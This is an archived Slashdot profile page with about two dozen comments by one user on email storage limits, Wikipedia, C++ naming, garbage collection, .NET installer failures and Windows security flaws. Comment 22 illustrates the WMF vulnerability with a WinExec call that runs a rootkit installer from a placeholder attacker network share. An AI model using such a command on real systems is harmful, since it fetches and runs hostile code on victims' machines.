Slashdot Mirror


User: julesh

julesh's activity in the archive.

Stories
0
Comments
8,446
First seen
Last seen
Profile
(view on slashdot.org)

Comments · 8,446

  1. Re:For God's sake on What Corporate Email Limits Do You Have? · · Score: 1

    Or you could avoid the costly training, and buy a $200 400 gB drive and double your disk space overnight and focus on other stuff, like making great products for instance.

    It isn't just the drive space -- it's the hassle of making backups. When that extra 400gB is taken up by individual 5Gb+ files, each of which changes on a daily basis, how on earth do you back it up? Most incremental backup solutions would crap themselves. You'll have to back up *all* of that data, *every day*. With an average tape backup system, you'll need 5 or more tapes and it'll take around 8 hours (i.e. a working day) to perform the backup. In case of a system failure, you're looking at the same amount of downtime while that data is being restored. A day without e-mail would cost most companies a lot of cash. A few hours is bad enough. If a working incremental solution is found (and let's face it, for this volume of data you need one), restore times will be longer still.

  2. Re:Proof? on Legal Issues of Opening Up Proprietary Standards? · · Score: 1

    All they have to do is file the suit and he'll probably have to settle due to the overwheming legal fees associated with defending oneself, even if he did absolutely nothing wrong.

    Isn't there such a thing in the US as legal expenses insurance? I have such a policy here in the UK, but no that things are different over there...

  3. Perhaps it is... on MS Thinks OOo is 10 Years Behind · · Score: 5, Insightful

    Here I am, still using Office 97 because it does everything I need. Perhaps next year I'll be able to upgrade to OO.o. :)

  4. Re:Prepare, O Station on Wikipedia Reaches 1,000,000 Articles · · Score: 1

    Jordanhill Railway Station, prepare to be vandalized!

    It's a Scottish railway station. It can take it. It's used to it.

  5. Re:Carefully chosen.... on Wikipedia Reaches 1,000,000 Articles · · Score: 1

    If you hit the 'random article' link a few times, you start to get a feel for this: most of the articles on wikipedia are about geographical features, administrative districts, and so on. I don't find it at all unusual that the millionth happened to be one.

  6. Re:Case Study: TrollTech on How Would You Launch a Dual-Licensed Product? · · Score: 1

    It works for Trolltech because their product is a library; same with MySQL. A GPL library is no use to most commercial developers. A GPL development tool, however, is probably almost as useful as a commercial one, and cheaper.

    I don't think it'll work.

  7. Re:Wikipedia is a place where you propose new term on Yahoo! Bans "Allah" in Screen Names · · Score: 1

    However "AOL Scunthorpe ban -wikipedia" turns up over a thousand. So most people discussing this are using a different name for it. Why worry about that?

  8. Re:Wikipedia: Dangerous Personality Cult? on An Interview with Wikipedia's Jimbo Wales · · Score: 1

    What you quote is a "proposed principle" that was considered for reaching an arbitration decision on a particular case where a particular user had repeatedly undone a particular action of Jimbo's. While it will likely be taken into account in similar cases in future, it is not a wikipedia policy.

  9. Re:Sounds like a molehill masquerading as a mounta on Microsoft's C++/CLI Spec Has an Identity Crisis · · Score: 1
    Your argument is fruitless. You forgot to define "C++".

    My point is that it isn't well defined. Various people might like to think that C++ means "the programming language C++ as standardised by the ISO in 1997", but in reality what people mean when they say C++ is a whole load of different things, depending on who's saying it and in what context.

    The reason the standards exist is to help with this *real* problem -- what is or isn't a compiler for this language.

    Yes, and that's fair enough. However, the fact that a language has been standardised doesn't mean that we're not now allowed to use the name for other things that would have been perfectly acceptable prior to that standard being published.

    Borland C++ 4.5 is still a C++ compiler, even if it doesn't support function templates or STL. It isn't, however, an ISO-compliant C++ compiler.

    The following is still a valid C program, despite the fact that it doesn't follow the syntax prescribed by the ANSI committee when they standardised C:
    main()
    {
      printf ("hello, world\n");
    }
    The point I'm making is simply this: "C++" (or "C") isn't something that's all that well defined. "ISO C++" (or "ANSI C") is. That's all.
  10. Re:releasing memory on Firefox Memory Leak is a Feature · · Score: 2, Insightful

    The good news is that a false positive isn't going to cause direct harm in mark and sweep. All that happens is that space that could be used isn't

    Or an allocated page leaks. While the collector's "blacklisting" approach minimises the amount of this that happens, it does still happen from time to time.

    Boehm claims this is irrelevant in today's operating systems with virtual memory, although I doubt you'd see an entire page's worth of false positives.

    I'm not entirely sure I agree with him. Consider, for example, applications that store large arrays of seemingly random data on the stack (e.g. compressed data). As the amount of this data tends towards (2^32/PAGESIZE)*4 bytes (= 2^24 bytes, or 16Mb), the number of pages blacklisted should approach half of available virtual memory, reducing to 2Gb the memory available for the application on a 32 bit address system (i.e. todays standard). 2Gb is a lot, but many applications are starting to get close to that. And doubling the amount of randomised data on the stack will halve it, I think.

    Boehm does most of his work on 64 bit platforms these days. I'm not surprised that he's unconcerned about virtual address space usage.

    That said, it's very simple to avoid this pitfall: use GC_MALLOC_ATOMIC to allocate any space that will store apparently-random data. You just have to understand how the garbage collector works, and code around it, to avoid such problems. I guess we're looking at a leaky abstraction here, as always.

  11. Re:The universe is safe. on Test for String Theory Developed · · Score: 1

    I love the way you used present tense there to describe an event that occurred within a billionth of a second of the universe coming into existence. Nicely done. :)

  12. Re:So what? on Microsoft's C++/CLI Spec Has an Identity Crisis · · Score: 2, Funny

    And I don't recall in which C compiler I first saw support for the end-of-line comment "//" (Vax C?), but is sure as hell was non-standard at the time. I don't recall any pulling of hair and renting of garments over that.

    You don't? Obviously you've never read comp.lang.c.

  13. Re:Sounds like a molehill masquerading as a mounta on Microsoft's C++/CLI Spec Has an Identity Crisis · · Score: 2, Insightful

    If a language is not ISO C++, it is not C++ and should not have C++ as part of the name.

    So I guess there weren't any C++ compilers between 1997 when the language was standardised and some time around 2001 when the compiler vendors started catching up with the features that had been included in the spec?

    Perhaps my copy of Borland C++ 4.5 from ~1994 isn't a C++ compiler at all, because the language hadn't been standardised when it was written?

    Here's a clue for you: in the real world, we call a compiler a C++ compiler if it compiles C++ code. It doesn't have to compile *all* C++ code for this to be true, just a useful subset. If it complies with the spec, so much the better. These we'll call ISO C++ compilers if we're in the mood to distinguish between them.

    The same happened with C when it was first standardised. The standard described a language substantially different from what older compilers understood and compiled, but those compilers didn't cease being C compilers just because they couldn't compile all the code that the spec said complying compilers had to. They just weren't ANSI C compilers.

  14. String quartet? on Windows Wireless Networking Flaw Identified · · Score: 3, Informative

    Loveless then created an ad hoc network with the same name, and told his computer to go ahead and connect to "hackme." Viola!

    Violin! Cello!

    Seriously, though, TFA doesn't seem to say quite the same thing as the summary. The demonstration the reporter saw involved him setting up an ad-hoc network, and then the security researcher was able to connect to it. Err... that's how it's supposed to work.

    The article then goes on to assume that this will happen when you connect to access points and then leave them, but you don't usually set up an ad hoc network for that process. Has he just got something wrong? Missed a step out or something? Is there a URL for a technical level article on this flaw?

    Should you at a later date happen to open up your laptop in the vicinity of another Windows user who also had recently gotten online at Starbucks, those two machines may connect to each other without any obvious notification to either user

    You mean other than the big speech bubble thing popping up and saying "Wireless Network Connection now connected to T-MOBILE"?

  15. Re:Class Action Lawsuite on Windows Wireless Networking Flaw Identified · · Score: 2, Insightful

    Ever read the EULA? You hold microsoft not responsible by agreeing.

    Disclaimers of warranty are not necessarily legally binding. A decision in court would involve questions of how fair it is for MS to disclaim liability for this.

  16. Re:I would not be suprised at all. on WMF Vulnerability is an Intentional Backdoor? · · Score: 1

    how do they get their updates via automatic updates? From thin air? No, they connect to some other machine's IP address, via a port. Perhaps it's not port 80, but I'm pretty certain it's the bank of Windows Update machines...

    Well, sure. But it doesn't go as far as a web browser, therefore no WMF files would be executed. The only thing autoupdate will do is download patches, check the signatures on them, and if they're valid, install them.

    Which means someone with the key to sign updates could own your system without this "back door", and somebody without it couldn't anyway.

  17. Re:I would not be suprised at all. on WMF Vulnerability is an Intentional Backdoor? · · Score: 1

    I assume that you're thinking of Windows Update, but at a guess I'd imagine that most (recent) Windows machines get most of their updates via automatic updates, or not at all.

    And if you actually rely on auto update, the answer is "not at all". Try a fresh XP install if you don't believe me: MS have changed the protocol, and you have to download an update (from the non-critical list) to "background intelligent transfer scheme" in order for it to work.

  18. Re:I haven't worked with both, but.... on JSF vs ASP.net · · Score: 1

    In addition to the other ides mentioned by the other posters, there's also Microsoft's WebMatrix, another free IDE for writing ASP.net code.

  19. Re:Come again, please? on Warp Engines In Development? · · Score: 1

    Um, what?! Granted I'm not a physicist or even a wanna-be, but if they had discovered (in the 50s!) the GUT/TOE that combines the gravitational force with the already unified electric, magnetic, and weak nuclear forces, I think I would have heard about it! Actually, I have heard of attempts, all of them recent and still in development (like string theory), and all of them lacking experimental verification.

    The reason we don't have a Grand Unified Theory yet is that there are actually several competing theories, and so far nobody has devised an experiment that we can actually perform that would allow us to select one over any other (or even discard all of them, if necessary). Also nobody has yet worked out all of the implications of them.

    The experiment badly described in this article is an attempt to verify an effect predicted by one of these theories. If it turns out to be a real effect, then we'll have a good candidate for a GUT.

    If you're going to accept as 'so far, so good' the concept of a magnetically-induced gravitational field I don't see why you won't accept the multi-dimensional part.

    Because magnetically-induced gravitation sounds somewhat like the kind of thing that might be possible, whereas 'disappearing into another dimension' doesn't.

  20. Re:I don't get it... on Pro C# · · Score: 1

    Right. But there are lots of problems. Those two were only typical examples.

    Here's the one I encountered: I installed .NET framework 1.1 (release version) on a recent clean install of XP Pro (an upgrade from Win98). The clock had been set using W98 to the correct year, but due to some kind of incompatibility between W98 and the machine's BIOS, the BIOS date was actually set to some time in 16408, rather than 2004. Win98 continued to read the date as 2004 up until I deleted it.

    This resulted in several system file creation timestamps on the new NTFS partition I created when installing XP having this year rather than the correct one. XP picking up that year from the BIOS rather than 2004 as 98 did, I quickly noticed and corrected the problem. Now, many files had modification dates before their creation dates. This caused the .NET framework installation to fail.

    In order to persuade .NET, I had to locate a utility that was able to correct the creation dates on these files. By the time I was finished, the process of installation cost me nearly a day.

  21. Re:I don't get it... on Pro C# · · Score: 1

    Why do so many people have problems installing the .NET 2.0 framework? BFD. Install it once. Done. Never have to worry about it again. Why all the hate?

    Because sometimes the installation fails and you have to piss around trying to make it work.

    Here's one possible problem. Sometimes you get something more like this. Note that he didn't get any useful information at all in the error message, but had to go digging through an obscure (and undocumented) log file in a hidden directory to find a description in obscure terminology of the cause of his problem.

    Installing .NET can be a real hassle.

  22. Re:Programmers? on Trustworthy Computing · · Score: 1

    My point was that good CPU architectures should be made so that you can't set the instruction pointer to some arbitrary, untrusted address.

    Well, that's true. And if used in the way Intel intended, the x86 architecture is one of these. You're supposed to set up your CS segment descriptor to point only to executable code; it's just programmer laziness that means almost all systems on the platform actually include the entire virtual address space in it. One of the BSDs (FreeBSD, I believe) actually uses this feature to provide a non-executable stack. I believe WinXP SP2 does the same for some applications, but only if they are marked as compatible with the approach. Windows XP SP2 on x86-64 is perfectly capable of providing such protection for all applications, using the 'NX' bit in page tables, as does (I believe) Linux.

    However, this kind of protection doesn't prevent vulnerabilities. It just makes them somewhat harder to exploit.

    In the present case, for instance, you would (I believe) still be able to arrange for any function you wanted to be called with any single parameter you wished. WinExec("\\[my ip address]\public_share\install_rootkit.exe") should do the job.

  23. Re:Shame on Trustworthy Computing · · Score: 1

    I would have expected it to; it has been a core part of GDI since Windows 2.0 was released, I believe. To not implement such a basic feature would be disastrous for app compatibility.

  24. Re:This Is Incomprehensible! on Trustworthy Computing · · Score: 1

    "They want you to trust that the unofficial patch for the Windows Metafile Volunerability that is currently being exploited by an IM worm."

    Obviously one instance of "that" is an extra. But which? Remove one, it means one thing; remove the other, it means something different.


    Actually, I parsed it as having a missing verb. Add "works correctly" to the end of the sentence and it's fine. Omitting the second 'that' results in a nonsensical statement, given the context. Removing the first 'that' is a possibility, and now you point it out it seems more likely than my original theory, but still both are possible I think.

    "No patch from Microsoft at this time,"

    Fragment (consider revising).


    Definitely revise. "Microsoft have not yet released a patch" is good for placing the emphasis on the fact that MS need to do it, and "No patch has been released by Microsoft at this time" works better for emphasising that there isn't a patch. I prefer the former, but that could be my bias. It's also slashdot's bias, so would probably better suit the article.

    (the snort rule will peg the CPU on your router)

    I guess somebody's snorting something. What the hell does this mean?


    I think it's pretty clear from context that snort is an intrusion detection system. Still, its name should have been set in italics or in quotation marks (the latter, given the way slashdot's submission system works), as it isn't one that most readers will be familiar with and there is a danger of confusing the name with the word that it is based on. Also "peg the CPU" is a colloquialism used only by a very restricted group of people. It's also somewhat inaccurate; I would say that "peg" in this context means "cause to be constantly in use", but I have little doubt that a suitably powerful router could cope with it on an average link without this happening.

    "Not really a whole lot of choice about this one."

    Fragment (consider revising).


    I'd leave this one. It enhances the style of the sentence over the obvious alternatives.

  25. Re:Trust not the issue... on Trustworthy Computing · · Score: 2, Informative

    Personally, I don't see the problem with temporarily unregistering the affected DLL...

    Because the flaw isn't in the image previewer used by the shell, it's in GDI32 which is a core OS component and can't be unregistered. Unregestering the image previewer will prevent a lot of attack vectors, sure, but there are probably others.